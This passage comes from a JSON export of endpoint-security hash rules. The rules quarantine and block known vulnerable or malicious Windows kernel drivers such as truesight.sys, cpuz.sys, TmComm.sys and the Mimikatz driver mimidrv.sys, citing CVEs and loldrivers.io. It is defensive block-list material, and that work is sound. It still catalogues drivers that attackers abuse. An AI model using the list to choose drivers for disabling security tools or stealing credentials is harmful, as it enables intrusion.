"comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f980dc73-8f9c-521c-a0ce-ac7962516c38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822389Z", + "creation_date": "2026-03-23T11:45:30.822391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822396Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aea066ef46a44a082e437c0fd68671ad77ee626f5864a0c2060e8fb970493635", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f997f526-472b-55f4-9e3a-405fdd9edeb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822476Z", 
+ "creation_date": "2026-03-23T11:45:30.822478Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f025ad896e6048a329aecb506503a79bc4d2717350f2c0bb7aec8fa52d31ba93", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9b4c0f4-bc34-5fa7-9d7a-9f1fd6480861", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146709Z", + "creation_date": "2026-03-23T11:45:31.146711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79f4933225a3b565ec0f74a64d91319d575dd9eed6ff4868794bfa1d5e82cf51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f9c5a377-f8ca-5879-8e9c-9dd98638ae29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834409Z", + "creation_date": "2026-03-23T11:45:30.834412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "325ad9da55291b6a1ea583850bcacdb33c07176b554262cb67ba5124f1a304c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9e4e385-4191-5d76-b4f1-b3555fff7c1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145224Z", + "creation_date": "2026-03-23T11:45:32.145226Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:32.145232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1fa7d8275ccd14a6adc438ef4b950e7de4ed26fcbe4b3e184243663b03c83d6", + "comment": "Vulnerable Kernel Driver (aka RtsPer.sys) [https://www.loldrivers.io/drivers/32155681-33e8-4d0d-b9f6-c822851e7321/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9f0fc4f-3b9c-5ab8-956f-2efa2e1fbeff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824079Z", + "creation_date": "2026-03-23T11:45:30.824081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3b526d6db56c3feadf29d4b0fbd4cfa21f9775e666c50f5a0a8aea81a41854f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa0dbbd9-0611-5ba5-a59d-12de3508900c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474797Z", + "creation_date": "2026-03-23T11:45:30.474800Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474809Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6522fc68fa686a546cd98142b90e5bcbfb8b79127cfb38b9a1249996d3d102dc", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa13a02f-465c-5ebf-be64-93c774e44dc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819172Z", + "creation_date": "2026-03-23T11:45:31.819174Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"bcb0af2a4110eed3b300569c081426799f44d20ede6db745f2014e887c9bf494", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa1da3f5-b8a6-5d23-b9b5-d96c39be1878", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466580Z", + "creation_date": "2026-03-23T11:45:30.466583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4999541c47abd4a7f2a002c180ae8d31c19804ce538b85870b8db53d3652862b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa26f938-10f4-5567-9516-2c556f033706", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983104Z", + "creation_date": "2026-03-23T11:45:29.983106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983111Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1", + "comment": "Malicious Kernel Driver (aka wantd_3.sys) [https://www.loldrivers.io/drivers/a22104a8-126d-449f-ba3e-28678c60c587/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa29acc7-bd3b-5a57-87be-debe5cc9f3d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613701Z", + "creation_date": "2026-03-23T11:45:29.613703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613708Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) 
[https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa2c8db6-40a5-54a9-b387-0358d2de1dc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979429Z", + "creation_date": "2026-03-23T11:45:29.979431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa36969f-32d9-5a42-bc76-c9b04b85d871", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453372Z", + "creation_date": "2026-03-23T11:45:30.453376Z", + "enabled": true, + "block_on_agent": true, 
+ "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453385Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "714d8791e37373f92f0242a6694cc232686caab69d7ae64b5ed31094cc352893", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa38521f-fe82-5d6b-ac97-5773591e7eba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835647Z", + "creation_date": "2026-03-23T11:45:30.835649Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835655Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fe64d42542f5546eb8c0a5e1da77ff237585d855344a8f63293ab86d1d56fc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa4428fb-3305-572e-bce5-8006479d5538", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484848Z", + "creation_date": "2026-03-23T11:45:31.484852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484863Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "356250aa436af02d651c84ba93f674f094e8a98563f58e39fd78cdbdf0e86353", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa55fdb2-091a-5f8d-b9a2-a20744e4f7f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825971Z", + "creation_date": "2026-03-23T11:45:31.825973Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825979Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37527e11e7c25b8b0390a22bfecff2919f261c780e631739ef6acbe9085b674d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa6574f1-01ca-5ca6-bf2f-44973a4a5dba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832058Z", + "creation_date": "2026-03-23T11:45:30.832060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "679c486ab26be098b8cd8bbc2b604eb94eebbb0265f79ccd91fa4d968b406d3e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa733f42-6a87-5377-86e2-3da723ba4cfc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151810Z", + "creation_date": "2026-03-23T11:45:31.151814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90044e79b27d7e5f9afac7f8d5025ad695bdda4f4a9023d2883a02f2c17b13f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa79fb52-7836-5ad5-93ed-2e26ce2eeb32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605926Z", + "creation_date": "2026-03-23T11:45:29.605928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605934Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"bced04bdefad6a08c763265d6993f07aa2feb57d33ed057f162a947cf0e6668f", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa8815db-5e3d-5372-9faf-655f2c9331d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974696Z", + "creation_date": "2026-03-23T11:45:29.974698Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92bb92314ad69e9d118df55924ddab76b983029f1eae7739bbb098c6bea86ca1", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa8a7006-79c8-56b4-8261-70af7dd4c359", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617575Z", + "creation_date": "2026-03-23T11:45:29.617577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73a0ccf3e32c262142bde91c19f5b1f395878783f157c6bed5874ede5a3afddd", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa9503ed-995a-5d9c-b512-0e12d74f46ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967117Z", + "creation_date": "2026-03-23T11:45:29.967121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5c267770f18d720313eedc7ff363989b04b21394e7c0179088d74b4d0fb2630", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] 
[https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fa975892-b079-51dd-ac70-ce2ca2c1e022", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826962Z", + "creation_date": "2026-03-23T11:45:30.826964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46257866237fe03e590247dc39daa60635c136eaab3e2c941944ff3348f17cfa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "faba1390-bece-5496-bb6a-29630672dca3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486167Z", 
+ "creation_date": "2026-03-23T11:45:31.486171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "244cf5603ec4960b86137f9bd58877b890871a961061b1160ddfddead099170f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fabaf23a-9cdc-5bde-8574-0a22fd6295e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 